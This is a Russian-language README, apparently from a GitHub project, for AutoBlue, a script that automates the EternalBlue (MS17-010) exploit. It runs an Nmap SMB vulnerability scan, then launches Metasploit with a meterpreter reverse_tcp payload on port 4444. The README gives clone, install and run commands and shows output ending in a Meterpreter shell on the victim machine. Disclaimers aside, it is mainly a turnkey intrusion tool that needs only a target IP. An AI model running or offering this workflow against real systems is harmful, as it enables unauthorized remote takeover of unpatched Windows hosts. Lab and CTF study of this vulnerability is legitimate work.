
AutoBlue - Automated EternalBlue (CVE-2017-0144 / MS17-010) exploitation tool leveraging Nmap and Metasploit for ethical hacking, penetration testing, and CTF challenges. Strictly for authorized and educational use only!
AUTOBLUE — это инструмент автоматизации, предназначенный для эксплуатации уязвимости EternalBlue (CVE-2017-0144) на машинах Windows. Инструмент объединяет возможности Nmap для сканирования уязвимостей и Metasploit's msfconsole для эксплуатации, позволяя пользователям автоматически выявлять уязвимые системы и запускать эксплойт EternalBlue для получения удаленного доступа к цели.
Этот инструмент в первую очередь предназначен для специалистов по безопасности, пентестеров и этичных хакеров, работающих в контролируемых, авторизованных средах, таких как задачи Capture The Flag (CTF), тестирование на проникновение или лабораторные настройки. AUTOBLUE позволяет пользователям эксплуатировать уязвимость EternalBlue с минимальным ручным вмешательством — достаточно просто ввести IP-адрес цели.
Возможности
Автоматизированное сканирование уязвимостей: Использует Nmap для поиска уязвимости EternalBlue (CVE-2017-0144) на целевой машине.
Бесшовная эксплуатация: Использует Metasploit's msfconsole для автоматического запуска эксплойта EternalBlue.
Простая настройка: Требуется только IP-адрес цели и рабочая среда с установленными Nmap и Metasploit.
Отчет о результатах: Генерирует вывод, указывающий на успех или неудачу попытки эксплуатации.
Содержание
Предварительные требования:
Перед использованием AUTOBLUE убедитесь, что на вашей машине установлены следующие инструменты:
Nmap: Инструмент для сканирования сети, чтобы обнаруживать уязвимые машины.
Metasploit Framework: Платформа для тестирования на проникновение, содержащая эксплойты для EternalBlue.
Установка Nmap:
Копировать код
sudo apt update
и
sudo apt install nmap
В Windows или macOS загрузите Nmap с официального сайта.
Установка Metasploit:
В Linux (на основе Debian):
Копировать код
sudo apt update
и
sudo apt install metasploit-framework
В Windows или macOS загрузите Metasploit с официального сайта.
Установка:
Чтобы установить AUTOBLUE, выполните следующие шаги:
Клонируйте репозиторий:
git clone https://github.com/AtithKhawas/autoblue.git
и
cd autoblue
Убедитесь, что Nmap и Metasploit правильно установлены как предварительные требования.
Сделайте скрипт исполняемым:
chmod +x autoblue.sh
Использование:
AUTOBLUE предназначен для автоматизации сканирования и эксплуатации уязвимости EternalBlue. Вот как его использовать:
Чтобы использовать AUTOBLUE, выполните следующую команду в терминале:
Копировать код
./autoblue.sh
Вывод:
┌──(root㉿kali)-[/home/Elliot]
└─# ./autoblue.sh
============================================
********************************************
AutoBlue - EternalBlue Exploit Automation
********************************************
********************************************
------------------------Made by ATITH KHAWAS
============================================
Enter Target IP Address:
Будет запрошен IP-адрес цели и ваш IP-адрес.
Пример
Enter Target IP Address: Target<IP Address>
Enter Your IP Address: Your <IP Address>
После запуска инструмента начнется сканирование с помощью Nmap:
Вывод-1
Target IP Address: ***.***.**.**
[+] Scanning Target for MS17-010 Vulnerability...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
Nmap scan report for ***.***.**.**
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
[+] Target is VULNERABLE to EternalBlue!
Здесь начинается настоящая работа, значительно сокращающая трудоемкий процесс. Если цель уязвима, автоматически запускается Msfconsole и устанавливаются RHOSTS, PAYLOAD, LHOST и LPORT с портом по умолчанию 4444.
Вывод-2
[+] Launching Metasploit...
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOSTS => ***.***.**.**
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => ***.***.**.**
LPORT => 4444
[*] Started reverse TCP handler on ***.***.**.**:4444
И предоставляет нам оболочку Meterpreter цели.
Вывод-3
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > pwd
C:\Windows\system32
Как это работает:
Сканирование с помощью Nmap Script: Инструмент сначала использует Nmap Script Scan (--script smb-vuln-ms17-010) для обнаружения, уязвима ли целевая машина к эксплойту EternalBlue. Он проверяет, открыт ли порт 445, и пытается выявить уязвимости SMB.
Эксплойт Metasploit: Если целевая машина найдена уязвимой, AUTOBLUE переходит к запуску эксплойта EternalBlue с помощью Metasploit's msfconsole. Скрипт настраивает и отправляет необходимый пейлоуд для эксплуатации уязвимости.
Обратная оболочка: Если эксплойт успешен, открывается обратная оболочка, предоставляющая интерфейс командной строки на машине жертвы.
Обратная связь: Инструмент предоставляет обратную связь в процессе работы, включая информацию о том, была ли цель успешно эксплуатирована, и выводит любые соответствующие сведения (например, IP-адрес обратной оболочки).
Соображения безопасности:
Законное использование: Этот инструмент следует использовать только в авторизованных средах. Убедитесь, что у вас есть явное разрешение на тестирование целевой машины и что это не запрещено законом в вашей юрисдикции.
Пользовательский ввод: Убедитесь, что в инструмент вводятся только доверенные IP-адреса, чтобы предотвратить неправильное использование. Запуск этого инструмента на недоверенных системах может привести к инцидентам безопасности.
Безопасность пейлоуда: Пейлоуд обратной оболочки, используемый в этом инструменте, по своей сути рискован. Не подвергайте атакующую машину или ее слушатели воздействию недоверенных сетей.
Обновляйте зависимости: Регулярно обновляйте Nmap и Metasploit, чтобы смягчить известные уязвимости безопасности в этих инструментах.
Вклад в проект:
Вклад в проект AUTOBLUE приветствуется. Если у вас есть предложения, улучшения или исправления ошибок, не стесняйтесь форкать репозиторий и создавать запрос на слияние.
Лицензия:
Этот инструмент является открытым исходным кодом и распространяется под лицензией MIT. Вы можете свободно использовать, изменять и распространять программное обеспечение в своих проектах. Однако вы должны включить это уведомление во все копии или существенные части программного обеспечения.
Благодарности:
Nmap: За предоставление функциональности сканирования уязвимостей.
Metasploit: За предоставление платформы для эксплуатации уязвимости EternalBlue.
Исследователи безопасности: За обнаружение и публичное раскрытие уязвимости EternalBlue, что помогло защитить системы по всему миру.
Отказ от ответственности:
AUTOBLUE — это инструмент, предназначенный только для образовательного и этического использования. Авторы не несут ответственности за любые незаконные действия, совершенные с использованием этого инструмента. Ваша обязанность — убедиться, что у вас есть явное разрешение на проведение тестов на проникновение в любой системе.
Используйте этот инструмент на свой страх и риск. Всегда проводите тестирование на проникновение в безопасной и законной среде.